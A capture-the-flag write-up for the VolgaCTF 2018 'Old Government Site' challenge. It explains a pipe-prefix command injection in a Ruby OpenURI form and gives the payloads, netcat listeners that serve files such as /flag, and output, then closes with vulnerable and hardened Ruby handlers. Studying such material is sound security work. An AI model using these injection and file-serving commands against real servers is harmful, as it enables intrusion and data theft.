$VolgaCTF 2018 Old Government Site (web150)

This is my writeup for the Web 150 VolgaCTF 2018 Quals challenge named "Old Government Site". In this challenge, users are presented with an "old government site" that looks like the following:

Navigating through the site, you can see that each page is selected by a unique page id parameter in the URL.

The page ids aren't sequential either, so I suspected there was likely a hidden page somewhere that isn't linked from the original HTML. I wrote the snippet below in Python to enumerate potential hidden pages:

The script found that a page with id=18 was valid, and it appeared to be a garbage pickup registration form. When you enter a valid web page URL and submit the form, you get a "validated" confirmation message:

I figured there was probably some sort of command injection here, where the attacker needed to pass validation and somehow tack on an extra command to be executed. When requesting a page that doesn't exist, you get a web server error indicating that the app runs on Sinatra, a Ruby framework. I googled around to see how HTTP requests are made in Ruby. OpenURI ended up being the method in use, and a quick search shows that it is command-injectable. Testing the pipe ("| ") prefix, the input is reported as validated, but we still don't get any output:

To confirm that my commands were actually running, I went through the painful process of redirecting output to files in /tmp and then serving them up with netcat:

| uname > /tmp/uname
| nc -l -p 32533 < /tmp/uname
Linux old-goverment 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Thankfully, things seemed to be running. Knowing it was running a recent version of Ubuntu, I went one step further and started a Python SimpleHTTPServer (which another team ended up using too ;) ), which let me download the app's source code:

Web app source:

Although the source didn't contain the flag, it still confirmed my command injection approach. Many injections and netcats later, I found a file named "flag" in the root directory:

| ls -la / > /tmp/root_ls.out
| nc -l -p 32533 < /tmp/root_ls.out

drwxr-xr-x  22 root root  4096 Mar 23 19:08 .
drwxr-xr-x  22 root root  4096 Mar 23 19:08 ..
drwxr-xr-x   2 root root  4096 Mar 23 19:05 bin
drwxr-xr-x   3 root root  4096 Mar 23 19:05 boot
drwxr-xr-x  17 root root  3680 Mar 24 18:39 dev
drwxr-xr-x  95 root root  4096 Mar 24 18:39 etc
-rw-r--r--   1 root root    41 Mar 23 19:37 flag
drwxr-xr-x   2 root root  4096 Apr 13  2016 home
lrwxrwxrwx   1 root root    33 Mar 16 19:01 initrd.img -> boot/initrd.img-4.4.0-116-generic
drwxr-xr-x  20 root root  4096 Mar 16 19:03 lib
drwxr-xr-x   2 root root  4096 Mar 16 19:02 lib64
drwx------   2 root root 16384 Mar 16 19:00 lost+found
drwxr-xr-x   2 root root  4096 Mar 16 19:00 media
drwxr-xr-x   2 root root  4096 Mar 16 19:00 mnt
drwxr-xr-x   3 root root  4096 Mar 23 19:37 opt
dr-xr-xr-x 397 root root     0 Mar 24 18:39 proc
drwx------   7 root root  4096 Mar 23 20:18 root
drwxr-xr-x  18 root root   580 Mar 24 18:40 run
drwxr-xr-x   2 root root  4096 Mar 23 19:05 sbin
drwxr-xr-x   2 root root  4096 Mar 16 19:00 srv
dr-xr-xr-x  13 root root     0 Mar 24 19:25 sys
drwxrwxrwt   8 root root  4096 Mar 25 08:56 tmp
drwxr-xr-x  10 root root  4096 Mar 16 19:00 usr
drwxr-xr-x  11 root root  4096 Mar 16 19:00 var
lrwxrwxrwx   1 root root    30 Mar 16 19:01 vmlinuz -> boot/vmlinuz-4.4.0-116-generic

| nc -l -p 32533 < /flag
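To close, here is the OpenURI pattern the challenge app relied on, beside a hardened form of the same handler. This is an added example written for this writeup, not the app's actual source shown above; the handler names, the allowed-scheme list and the sample inputs are assumptions, and only the parsing/validation part is exercised here (nothing is fetched or executed).

```ruby
require "open-uri"
require "uri"

# VULNERABLE PATTERN (what the writeup exploits): Kernel#open treats a
# string that begins with "|" as a command and runs it via IO.popen, and
# in Ruby < 3.0 open-uri extended Kernel#open so the same call also
# fetched URLs. Passing the form's URL field straight into it means
# "| uname > /tmp/uname" is executed on the server instead of fetched.
def validate_site_unsafe(url)
  open(url) { |io| io.read }
end

# HARDENED FORM (added here, not the challenge's code): parse the input,
# accept only an absolute http(s) URL with a host, and fetch through
# URI::HTTP#open, which only knows how to speak HTTP.
ALLOWED_SCHEMES = %w[http https].freeze

# Returns a URI::HTTP(S) for acceptable input, nil for anything else:
# pipe prefixes, file: URLs, scheme-less strings and unparsable junk.
def parse_site_url(input)
  uri = URI.parse(input.to_s)
  return nil unless ALLOWED_SCHEMES.include?(uri.scheme)
  return nil if uri.host.nil? || uri.host.empty?
  uri
rescue URI::InvalidURIError
  nil
end

def validate_site(input)
  uri = parse_site_url(input)
  raise ArgumentError, "only absolute http(s) URLs are accepted" unless uri
  uri.open { |io| io.read }   # open-uri's OpenRead#open on a parsed URI
end

# Constructed sample inputs, as the registration form might receive them.
SAMPLE_INPUTS = [
  "http://example.com/garbage-pickup",
  "| uname > /tmp/uname",
  "| nc -l -p 32533 < /flag",
  "file:///flag",
].freeze

# Maps each input to whether the hardened handler would fetch it (true)
# or reject it before anything is opened (false).
def classify_inputs(inputs = SAMPLE_INPUTS)
  inputs.map { |s| [s, !parse_site_url(s).nil?] }.to_h
end
```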